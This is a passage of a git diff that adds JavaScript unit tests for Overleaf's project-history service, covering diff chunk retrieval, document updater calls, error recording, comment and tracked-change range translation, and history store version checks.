this.callback + ) + }) + + it('should make sure all pending updates have been process', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the updates from the history backend', function () { + this.DiffManager._mocks._getProjectUpdatesBetweenVersions + .calledWith( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion + ) + .should.equal(true) + }) + + it('should convert the updates to a diff', function () { + this.DiffGenerator.buildDiff + .calledWith(this.initialContent, this.updates) + .should.equal(true) + }) + + it('should return the diff', function () { + this.callback.calledWith(null, this.diff).should.equal(true) + }) + }) + + describe('with a binary file', function () { + beforeEach(function () { + this.DiffManager._mocks._getProjectUpdatesBetweenVersions = sinon.stub() + this.DiffManager._mocks._getProjectUpdatesBetweenVersions + .withArgs( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion + ) + .yields(null, { binary: true }) + this.DiffManager.getDiff( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion, + this.callback + ) + }) + + it('should make sure all pending updates have been process', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the updates from the history backend', function () { + this.DiffManager._mocks._getProjectUpdatesBetweenVersions + .calledWith( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion + ) + .should.equal(true) + }) + + it('should not try convert any updates to a diff', function () { + this.DiffGenerator.buildDiff.called.should.equal(false) + }) + + it('should return the binary diff', function () { + this.callback.calledWith(null, { binary: true }).should.equal(true) + }) + }) + }) + + describe('_getProjectUpdatesBetweenVersions', function () { + beforeEach(function () { + this.pathname = 'main.tex' + this.fromVersion = 4 + this.toVersion = 8 + this.chunks = ['mock-chunk-1', 'mock-chunk-2'] + this.concatted_chunk = 'mock-chunk' + this.DiffManager._mocks._concatChunks = sinon.stub() + this.DiffManager._mocks._concatChunks + .withArgs(this.chunks) + .returns(this.concatted_chunk) + this.updates = ['mock-updates'] + this.initialContent = 'foo bar baz' + this.ChunkTranslator.convertToDiffUpdates + .withArgs( + this.projectId, + this.concatted_chunk, + this.pathname, + this.fromVersion, + this.toVersion + ) + .yields(null, { + initialContent: this.initialContent, + updates: this.updates, + }) + }) + + describe('for the normal case', function () { + beforeEach(function () { + this.DiffManager._mocks._getChunks = sinon.stub() + this.DiffManager._mocks._getChunks + .withArgs(this.projectId, this.fromVersion, this.toVersion) + .yields(null, this.chunks) + this.DiffManager._getProjectUpdatesBetweenVersions( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion, + this.callback + ) + }) + + it('should get the relevant chunks', function () { + this.DiffManager._mocks._getChunks + .calledWith(this.projectId, this.fromVersion, this.toVersion) + .should.equal(true) + }) + + it('should get the concat the chunks', function () { + this.DiffManager._mocks._concatChunks + .calledWith(this.chunks) + .should.equal(true) + }) + + it('should convert the chunks to an initial version and updates', function () { + this.ChunkTranslator.convertToDiffUpdates + .calledWith( + this.projectId, + this.concatted_chunk, + this.pathname, + this.fromVersion, + this.toVersion + ) + .should.equal(true) + }) + + it('should return the initialContent and updates', function () { + this.callback + .calledWith(null, { + initialContent: this.initialContent, + updates: this.updates, + }) + .should.equal(true) + }) + }) + + describe('for the error case', function () { + beforeEach(function () { + this.DiffManager._mocks._getChunks = sinon.stub() + this.DiffManager._mocks._getChunks + .withArgs(this.projectId, this.fromVersion, this.toVersion) + .yields(new Error('failed to load chunk')) + this.DiffManager._getProjectUpdatesBetweenVersions( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + describe('_getChunks', function () { + beforeEach(function () { + this.historyId = 'mock-overleaf-id' + this.WebApiManager.getHistoryId.yields(null, this.historyId) + }) + + describe('where only one chunk is needed', function () { + beforeEach(function (done) { + this.fromVersion = 4 + this.toVersion = 8 + this.chunk = { + chunk: { + startVersion: 2, + }, // before fromVersion + } + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk) + this.DiffManager._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it("should the project's overleaf id", function () { + this.WebApiManager.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should request the first chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should return an array of chunks', function () { + expect(this.chunks).to.deep.equal([this.chunk]) + }) + }) + + describe('where multiple chunks are needed', function () { + beforeEach(function (done) { + this.fromVersion = 4 + this.toVersion = 8 + this.chunk1 = { + chunk: { + startVersion: 6, + }, + } + this.chunk2 = { + chunk: { + startVersion: 2, + }, + } + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk1) + this.HistoryStoreManager.getChunkAtVersion + .withArgs( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .yields(null, this.chunk2) + this.DiffManager._mocks._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it('should request the first chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should request the second chunk, from where the first one started', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .should.equal(true) + }) + + it('should return an array of chunks', function () { + expect(this.chunks).to.deep.equal([this.chunk1, this.chunk2]) + }) + }) + + describe('where more than MAX_CHUNKS are requested', function () { + beforeEach(function (done) { + this.fromVersion = 0 + this.toVersion = 8 + this.chunk1 = { + chunk: { + startVersion: 6, + }, + } + this.chunk2 = { + chunk: { + startVersion: 4, + }, + } + this.chunk3 = { + chunk: { + startVersion: 2, + }, + } + this.DiffManager.setMaxChunkRequests(2) + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk1) + this.HistoryStoreManager.getChunkAtVersion + .withArgs( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .yields(null, this.chunk2) + this.DiffManager._mocks._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it('should request the first chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should request the second chunk, from where the first one started', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .should.equal(true) + }) + + it('should not request the third chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith( + this.projectId, + this.historyId, + this.chunk2.chunk.startVersion + ) + .should.equal(false) + }) + + it('should return an error', function () { + expect(this.error).to.exist + expect(this.error.message).to.equal('Diff spans too many chunks') + expect(this.error.name).to.equal('BadRequestError') + }) + }) + + describe('where fromVersion == toVersion', function () { + beforeEach(function (done) { + this.fromVersion = 4 + this.toVersion = 4 + this.chunk = { + chunk: { + startVersion: 2, + }, // before fromVersion + } + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk) + this.DiffManager._mocks._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it('should still request the first chunk (because we need the file contents)', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should return an array of chunks', function () { + expect(this.chunks).to.deep.equal([this.chunk]) + }) + }) + }) + + describe('_concatChunks', function () { + it('should concat the chunks in reverse order', function () { + const result = this.DiffManager._mocks._concatChunks([ + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-updated-2', + }, + }, + changes: [7, 8, 9], + }, + }, + }, + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-updated', + }, + }, + changes: [4, 5, 6], + }, + }, + }, + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-original', + }, + }, + changes: [1, 2, 3], + }, + }, + }, + ]) + + expect(result).to.deep.equal({ + chunk: { + history: { + snapshot: { + files: { + mock: 'files-original', + }, + }, + changes: [1, 2, 3, 4, 5, 6, 7, 8, 9], + }, + }, + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js b/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js new file mode 100644 index 0000000..a745eb4 --- /dev/null +++ b/services/project-history/test/unit/js/DocumentUpdaterManager/DocumentUpdaterManagerTests.js @@ -0,0 +1,184 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DocumentUpdaterManager.js' + +describe('DocumentUpdaterManager', function () { + beforeEach(async function () { + this.settings = { + apis: { documentupdater: { url: 'http://example.com' } }, + } + this.request = { + get: sinon.stub(), + post: sinon.stub(), + } + this.DocumentUpdaterManager = await esmock(MODULE_PATH, { + request: this.request, + '@overleaf/settings': this.settings, + }) + this.callback = sinon.stub() + this.lines = ['one', 'two', 'three'] + return (this.version = 42) + }) + + describe('getDocument', function () { + describe('successfully', function () { + beforeEach(function () { + this.body = JSON.stringify({ + lines: this.lines, + version: this.version, + ops: [], + }) + this.request.get.yields(null, { statusCode: 200 }, this.body) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should get the document from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}` + return this.request.get.calledWith(url).should.equal(true) + }) + + return it('should call the callback with the content and version', function () { + return this.callback + .calledWith(null, this.lines.join('\n'), this.version) + .should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.request.get.yields(this.error, null, null) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.get.yields(null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match.has( + 'message', + 'doc updater returned a non-success status code: 500' + ) + ) + .should.equal(true) + }) + }) + }) + + return describe('setDocument', function () { + beforeEach(function () { + this.content = 'mock content' + return (this.user_id = 'user-id-123') + }) + + describe('successfully', function () { + beforeEach(function () { + this.request.post.yields(null, { statusCode: 200 }) + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + it('should set the document in the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}` + return this.request.post + .calledWith({ + url, + json: { + lines: this.content.split('\n'), + source: 'restore', + user_id: this.user_id, + undoing: true, + }, + }) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.request.post.yields(this.error, null, null) + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.post.yields(null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.setDocument( + this.project_id, + this.doc_id, + this.content, + this.user_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match.has( + 'message', + 'doc updater returned a non-success status code: 500' + ) + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js b/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js new file mode 100644 index 0000000..79af1a8 --- /dev/null +++ b/services/project-history/test/unit/js/ErrorRecorder/ErrorRecorderTest.js @@ -0,0 +1,96 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' +import tk from 'timekeeper' + +const MODULE_PATH = '../../../../app/js/ErrorRecorder.js' + +describe('ErrorRecorder', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.db = { + projectHistoryFailures: { + deleteOne: sinon.stub().resolves(), + findOneAndUpdate: sinon + .stub() + .resolves({ value: { failure: 'record' } }), + }, + } + this.mongodb = { db: this.db } + this.metrics = { gauge: sinon.stub() } + this.ErrorRecorder = await esmock(MODULE_PATH, { + '../../../../app/js/mongodb.js': this.mongodb, + '@overleaf/metrics': this.metrics, + }) + + this.project_id = 'project-id-123' + this.queueSize = 445 + }) + + afterEach(function () { + tk.reset() + }) + + describe('record', function () { + beforeEach(async function () { + this.error = new Error('something bad') + await this.ErrorRecorder.promises.record( + this.project_id, + this.queueSize, + this.error + ) + }) + + it('should record the error to mongo', function () { + this.db.projectHistoryFailures.findOneAndUpdate + .calledWithMatch( + { + project_id: this.project_id, + }, + { + $set: { + queueSize: this.queueSize, + error: this.error.toString(), + stack: this.error.stack, + ts: this.now, + }, + $inc: { + attempts: 1, + }, + $push: { + history: { + $each: [ + { + queueSize: this.queueSize, + error: this.error.toString(), + stack: this.error.stack, + ts: this.now, + }, + ], + $position: 0, + $slice: 10, + }, + }, + }, + { + upsert: true, + } + ) + .should.equal(true) + }) + }) + + describe('clearError', function () { + beforeEach(async function () { + this.result = await this.ErrorRecorder.promises.clearError( + this.project_id + ) + }) + + it('should remove any error from mongo', function () { + this.db.projectHistoryFailures.deleteOne + .calledWithMatch({ project_id: this.project_id }) + .should.equal(true) + }) + }) +}) diff --git a/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js b/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js new file mode 100644 index 0000000..c07aee8 --- /dev/null +++ b/services/project-history/test/unit/js/HistoryBlobTranslator/HistoryBlobTranslatorTests.js @@ -0,0 +1,497 @@ +import { expect } from 'chai' +import { createRangeBlobDataFromUpdate } from '../../../../app/js/HistoryBlobTranslator.js' + +/** + * @import { AddDocUpdate } from "../../../../app/js/types" + */ + +/** + * + * @param {string} pathname s + * @param {string} docLines + * @param {AddDocUpdate["ranges"]} ranges + * @returns {AddDocUpdate} + */ +const update = (pathname, docLines, ranges) => { + return { + pathname, + docLines, + ranges, + version: 'version-1', + projectHistoryId: 'project-id', + doc: 'doc', + meta: { + user_id: 'user-id', + ts: 0, + }, + } +} + +describe('HistoryBlobTranslator', function () { + describe('createBlobDataFromUpdate', function () { + beforeEach(function () { + this.text = 'the quick brown fox jumps over the lazy dog' + }) + describe('for update with no ranges', function () { + beforeEach(function () { + this.result = createRangeBlobDataFromUpdate( + update('pathname', this.text, undefined) + ) + }) + + it('should not return ranges', function () { + expect(this.result).to.be.undefined + }) + }) + + describe('for update with empty ranges object', function () { + beforeEach(function () { + this.result = createRangeBlobDataFromUpdate( + update('pathname', this.text, {}) + ) + }) + + it('should not return ranges', function () { + expect(this.result).to.be.undefined + }) + }) + + describe('for update with ranges object with empty lists', function () { + beforeEach(function () { + this.result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { changes: [], comments: [] }) + ) + }) + + it('should not return ranges', function () { + expect(this.result).to.be.undefined + }) + }) + + describe('for update with zero length comments', function () { + beforeEach(function () { + this.result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + changes: [], + comments: [ + { op: { c: '', p: 4, t: 'comment-1', resolved: false } }, + ], + }) + ) + }) + it('should treat them as detached comments', function () { + expect(this.result).to.deep.equal({ + comments: [{ id: 'comment-1', ranges: [] }], + trackedChanges: [], + }) + }) + }) + + describe('for update with ranges object with only comments', function () { + it('should return unmoved ranges', function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + id: 'comment-1', + ranges: [{ pos: 4, length: 5 }], + }, + ], + trackedChanges: [], + }) + }) + + it('should merge comments ranges into a single comment by id', function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + { + op: { c: 'jumps', p: 20, t: 'comment-1', resolved: false }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + id: 'comment-1', + ranges: [ + { pos: 4, length: 5 }, + { pos: 20, length: 5 }, + ], + }, + ], + trackedChanges: [], + }) + }) + + it('should not merge ranges into a single comment if id differs', function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + { + op: { c: 'jumps', p: 20, t: 'comment-2', resolved: false }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + id: 'comment-1', + ranges: [{ pos: 4, length: 5 }], + }, + { + id: 'comment-2', + ranges: [{ pos: 20, length: 5 }], + }, + ], + trackedChanges: [], + }) + }) + }) + + describe('for update with ranges object with only tracked insertions', function () { + it('should translate into history tracked insertions', function () { + const result = createRangeBlobDataFromUpdate( + update('pathname', this.text, { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, i: 'brown' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('for update with ranges object with mixed tracked changes', function () { + describe('with tracked deletions before insertions', function () { + it('should insert tracked deletions before insertions', function () { + const text = 'the quickrapid brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, d: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 4, hpos: 9, i: 'rapid' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 9, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('with tracked insertions before deletions', function () { + it('should insert tracked deletions before insertions', function () { + const text = 'the quickrapid brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, hpos: 9, i: 'rapid' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 4, d: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + ], + }) + ) + + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 9, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + it('should adjust positions', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, d: 'brown' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 30, hpos: 35, i: 'lazy' }, + metadata: { + ts: '2022-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 35, length: 4 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2022-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + + describe('for update with ranges object with mixed tracked changes and comments', function () { + it('should adjust positions', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + comments: [ + { + op: { c: 'quick', p: 4, t: 'comment-1', resolved: false }, + }, + { + op: { + c: 'fox', + p: 11, + hpos: 16, + t: 'comment-2', + resolved: false, + }, + }, + ], + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: 'user-1', + }, + }, + { + op: { p: 10, d: 'brown' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + { + op: { p: 30, hpos: 35, i: 'lazy' }, + metadata: { + ts: '2022-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + ranges: [{ pos: 4, length: 5 }], + id: 'comment-1', + }, + { + ranges: [{ pos: 16, length: 3 }], + id: 'comment-2', + }, + ], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'insert', + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 5 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 35, length: 4 }, + tracking: { + type: 'insert', + userId: 'user-2', + ts: '2022-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + + it('should adjust comment length', function () { + const text = 'the quick brown fox jumps over the lazy dog' + const result = createRangeBlobDataFromUpdate( + update('pathname', text, { + comments: [ + { + op: { c: 'quick fox', p: 4, t: 'comment-1', resolved: false }, + }, + ], + changes: [ + { + op: { p: 10, d: 'brown ' }, + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: 'user-2', + }, + }, + ], + }) + ) + expect(result).to.deep.equal({ + comments: [ + { + ranges: [{ pos: 4, length: 9 }], + id: 'comment-1', + }, + ], + trackedChanges: [ + { + range: { pos: 10, length: 6 }, + tracking: { + type: 'delete', + userId: 'user-2', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js b/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js new file mode 100644 index 0000000..db5b87d --- /dev/null +++ b/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js @@ -0,0 +1,727 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import EventEmitter from 'node:events' +import { RequestFailedError } from '@overleaf/fetch-utils' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/HistoryStoreManager.js' + +describe('HistoryStoreManager', function () { + beforeEach(async function () { + this.projectId = '123456789012345678901234' + this.historyId = 'mock-ol-project-id' + this.settings = { + overleaf: { + history: { + host: 'http://example.com', + user: 'overleaf', + pass: 'password', + requestTimeout: 123, + }, + }, + apis: { + filestore: { + enabled: true, + url: 'http://filestore.overleaf.production', + }, + }, + } + this.latestChunkRequestArgs = sinon.match({ + method: 'GET', + url: `${this.settings.overleaf.history.host}/projects/${this.historyId}/latest/history`, + json: true, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + }) + + this.callback = sinon.stub() + + this.LocalFileWriter = { + bufferOnDisk: sinon.stub(), + } + + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + + this.FetchUtils = { + fetchStream: sinon.stub(), + fetchNothing: sinon.stub().resolves(), + RequestFailedError, + } + + this.request = sinon.stub() + + this.logger = { + debug: sinon.stub(), + warn: sinon.stub(), + } + + this.HistoryStoreManager = await esmock(MODULE_PATH, { + '@overleaf/fetch-utils': this.FetchUtils, + request: this.request, + '@overleaf/settings': this.settings, + '../../../../app/js/LocalFileWriter.js': this.LocalFileWriter, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/Errors.js': Errors, + '@overleaf/logger': this.logger, + }) + }) + + describe('getMostRecentChunk', function () { + describe('successfully', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: {}, + }, + changes: [], + }, + }, + } + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentChunk( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should call the callback with the chunk', function () { + expect(this.callback).to.have.been.calledWith(null, this.chunk) + }) + }) + }) + + describe('getMostRecentVersion', function () { + describe('successfully', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + files: {}, + }, + changes: [ + { v2Authors: ['5678'], timestamp: '2017-10-17T10:44:40.227Z' }, + { v2Authors: ['1234'], timestamp: '2017-10-16T10:44:40.227Z' }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + null, + 7, + { project: undefined, docs: {} }, + { v2Authors: ['5678'], timestamp: '2017-10-17T10:44:40.227Z' } + ) + }) + }) + + describe('out of order doc ops', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 2, + }, + }, + }, + changes: [ + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and(sinon.match.has('message', 'doc version out of order')) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 6, + { + project: undefined, + docs: { mock_doc_id: { pathname: '/main.tex', v: 2 } }, + }, + this.chunk.chunk.history.changes[0] + ) + }) + }) + + describe('out of order project structure versions', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + projectVersion: 2, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and( + sinon.match.has( + 'message', + 'project structure version out of order' + ) + ) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 6, + { project: 2, docs: {} }, + this.chunk.chunk.history.changes[0] + ) + }) + }) + + describe('out of order project structure and doc versions', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 5, + history: { + snapshot: { + projectVersion: 1, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 2, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 3, + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + projectVersion: 1, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 2, + }, + }, + }, + { + operations: [], + v2DocVersions: { + mock_doc_id: { + pathname: '/main.tex', + v: 1, + }, + }, + }, + ], + }, + }, + } + + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.chunk) + 